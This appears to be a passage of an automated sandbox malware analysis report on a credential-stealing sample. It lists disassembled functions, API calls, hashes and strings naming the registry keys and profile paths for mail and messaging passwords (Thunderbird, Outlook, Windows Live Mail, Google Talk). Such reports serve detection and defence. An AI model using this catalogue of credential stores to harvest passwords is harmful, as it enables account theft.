                                                                            • strlen.MSVCRT ref: 004020AF
                                                                            • strlen.MSVCRT ref: 004020E2
                                                                            • strlen.MSVCRT ref: 004020F0
                                                                            • memset.MSVCRT ref: 00402018
                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                            • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                            • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                            • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                            • API String ID: 1846531875-4223776976
                                                                            • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                            • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                            • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                            • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                            Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                              • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                              • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                              • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                            • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                            • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                            • API String ID: 745651260-375988210
                                                                            • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                                            • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                            • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                                            • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                            Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                            • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                            • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                            • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                            Strings
                                                                            • PStoreCreateInstance, xrefs: 00403C44
                                                                            • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                            • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                            • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                            • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                            • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                            • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                            • pstorec.dll, xrefs: 00403C30
                                                                            • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                            • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                            • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                            • API String ID: 1197458902-317895162
                                                                            • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                            • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                            • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                            • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                            Function 00444C4A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 239 444c80-444c85 236->239 240 444c9f-444ca3 236->240 245 444d02-444d0d __setusermatherr 237->245 246 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->246 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 244 444cad-444cb0 241->244 243->234 247 444c95-444c9d 243->247 244->237 245->246 250 444da4-444da7 246->250 251 444d6a-444d72 246->251 247->244 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                            • String ID: k4w
                                                                            • API String ID: 3662548030-446051039
                                                                            • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                            • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                            • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                            • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                                            Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 269 40fb00-40fb35 call 44b090 RegOpenKeyExA 272 40fc37-40fc3d 269->272 273 40fb3b-40fb4f RegOpenKeyExA 269->273 274 40fb55-40fb7e RegQueryValueExA 273->274 275 40fc2d-40fc31 RegCloseKey 273->275 276 40fc23-40fc27 RegCloseKey 274->276 277 40fb84-40fb93 call 404734 274->277 275->272 276->275 277->276 280 40fb99-40fbd1 call 4047a5 277->280 280->276 283 40fbd3-40fbdb 280->283 284 40fc19-40fc1d LocalFree 283->284 285 40fbdd-40fc14 memcpy * 2 call 40f802 283->285 284->276 285->284
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                            • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                            • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                            • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                            • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                              • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                              • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                              • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                              • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                            • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                            • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                            • API String ID: 2768085393-2409096184
                                                                            • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                            • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                            • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                            • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                            Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 0044430B
                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                              • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                              • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                              • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                              • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                            • memset.MSVCRT ref: 00444379
                                                                            • memset.MSVCRT ref: 00444394
                                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                            • ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                            • strlen.MSVCRT ref: 004443DB
                                                                            • _strcmpi.MSVCRT ref: 00444401
                                                                            Strings
                                                                            • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                            • Store Root, xrefs: 004443A5
                                                                            • \Microsoft\Windows Mail, xrefs: 00444329
                                                                            • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                            • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                            • API String ID: 832325562-2578778931
                                                                            • Opcode ID: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                                            • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                            • Opcode Fuzzy Hash: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                                            • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                            Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 320 40f67a-40f67d 319->320 320->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 320->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->320 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040F567
                                                                            • memset.MSVCRT ref: 0040F57F
                                                                              • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                            • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                            • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                            • String ID:
                                                                            • API String ID: 2012582556-3916222277
                                                                            • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                            • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                            • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                            • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                            Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004037EB
                                                                            • memset.MSVCRT ref: 004037FF
                                                                              • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                              • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                            • strchr.MSVCRT ref: 0040386E
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                            • strlen.MSVCRT ref: 00403897
                                                                            • sprintf.MSVCRT ref: 004038B7
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                            • String ID: %s@yahoo.com
                                                                            • API String ID: 317221925-3288273942
                                                                            • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                            • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                            • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                            • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                            Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 361 404af5-404afa 356->361 362 404adb 357->362 358->356 359 404ae8-404aea 358->359 359->361 363 404b13-404b17 361->363 364 404afc-404b12 MessageBoxA 361->364 362->358
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                            • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                            • API String ID: 2780580303-317687271
                                                                            • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                            • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                            • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                            • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                            Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403504
                                                                            • memset.MSVCRT ref: 0040351A
                                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                            • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                            • _mbscat.MSVCRT ref: 0040356D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                            • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                            • API String ID: 3071782539-966475738
                                                                            • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                            • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                            • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                            • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                            Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 381 40cd31-40cd57 378->381 379->381 383 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 381->383 384 40cd59-40cd60 DeleteObject 381->384 384->383
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                            • String ID:
                                                                            • API String ID: 2054149589-0
                                                                            • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                            • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                            • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                            • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                            Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                              • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                              • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                            • memset.MSVCRT ref: 00408620
                                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                            • memset.MSVCRT ref: 00408671
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                            Strings
                                                                            • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                            • String ID: Software\Google\Google Talk\Accounts
                                                                            • API String ID: 1366857005-1079885057
                                                                            • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                            • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                            • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                            • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                            Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 427 40ba74 421->427 428 40ba6f-40ba72 421->428 422->415 422->416 424 40baa0-40bab3 call 407e30 431 40bab5-40bac1 424->431 432 40bafa-40bb09 SetCursor 424->432 430 40ba75-40ba76 call 40b5e5 427->430 428->430 430->422 434 40bac3-40bace 431->434 435 40bad8-40baf7 qsort 431->435 434->435 435->432 438->424 439->424 440->424 441->424 442->424
